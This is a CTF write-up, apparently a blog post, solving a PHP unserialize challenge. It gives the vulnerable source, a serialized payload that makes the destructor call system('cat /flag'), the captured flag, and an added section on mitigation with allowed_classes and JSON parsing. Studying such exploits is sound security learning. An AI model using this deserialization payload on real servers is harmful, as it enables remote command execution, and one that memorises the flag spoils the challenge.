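<?php
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
    function __destruct()
    {
        $a = $this->lt;
        $a($this->lly); // equivalent to ($this->lt)($this->lly), i.e. lt(lly)
    }
}
// The POST parameter is deserialized directly, so the caller controls every property of the object
unserialize($_POST['nss']);
highlight_file(__FILE__);
?>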
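This brings command-execution functions to mind. The destructor calls whatever function name is stored in lt and passes it lly as the argument, and both properties come from the deserialized input. We need to construct a payload: if $a can be replaced with system and lly with a cat command, command injection becomes possible. Construct the payload: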
<?php
class lyh{
    public $url = 'NSSCTF.com';
    public $lt = 'system';
    public $lly = 'cat /flag';
}
$b = new lyh();
echo serialize($b);
?>
Submit the payload: nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
This returns the flag: NSSCTF{934dfc44-3e21-47d8-b350-d0c932ffeab9}
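The root cause is calling unserialize() on request data while a class with a callable-invoking __destruct() is loaded. The following is an added example, not part of the original write-up: it runs the same class shape against a constructed, benign input and shows how `allowed_classes` (PHP 7.0+) or a data-only format keeps the destructor from firing. `gadget_fired()` and `safe_parse()` are hypothetical names introduced for the illustration.

```php
<?php
// Added example. gadget_fired() is a harmless stand-in for the function name
// that the input chooses; it only records that it was called.
$calls = [];
function gadget_fired($arg) {
    global $calls;
    $calls[] = $arg;
}

class lyh {                                  // same shape as the challenge class
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
    function __destruct() {
        $a = $this->lt;
        $a($this->lly);
    }
}

// Constructed input with benign property values.
$input = 'O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";'
       . 's:2:"lt";s:12:"gadget_fired";s:3:"lly";s:4:"demo";}';

// 1) Pattern from the challenge: a lyh object is rebuilt from the input and
//    its destructor invokes the function named in the input.
$obj = unserialize($input);
unset($obj);
echo "plain unserialize: ", count($calls), " call(s)\n";

// 2) allowed_classes => false: objects become __PHP_Incomplete_Class, so no
//    lyh instance exists and lyh::__destruct() never runs.
$calls = [];
$obj = unserialize($input, ['allowed_classes' => false]);
echo "type returned: ", get_class($obj), "\n";
unset($obj);
echo "allowed_classes=false: ", count($calls), " call(s)\n";

// 3) Preferred: accept a data-only format and copy out validated fields only.
function safe_parse(string $json): ?string {
    $data = json_decode($json, true);
    if (!is_array($data) || !isset($data['url']) || !is_string($data['url'])) {
        return null;
    }
    return $data['url'];                     // extra keys such as "lt" are ignored
}
var_dump(safe_parse('{"url":"NSSCTF.com","lt":"gadget_fired"}'));
```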
From: https://blog.csdn.net/2301_80871705/article/details/142962041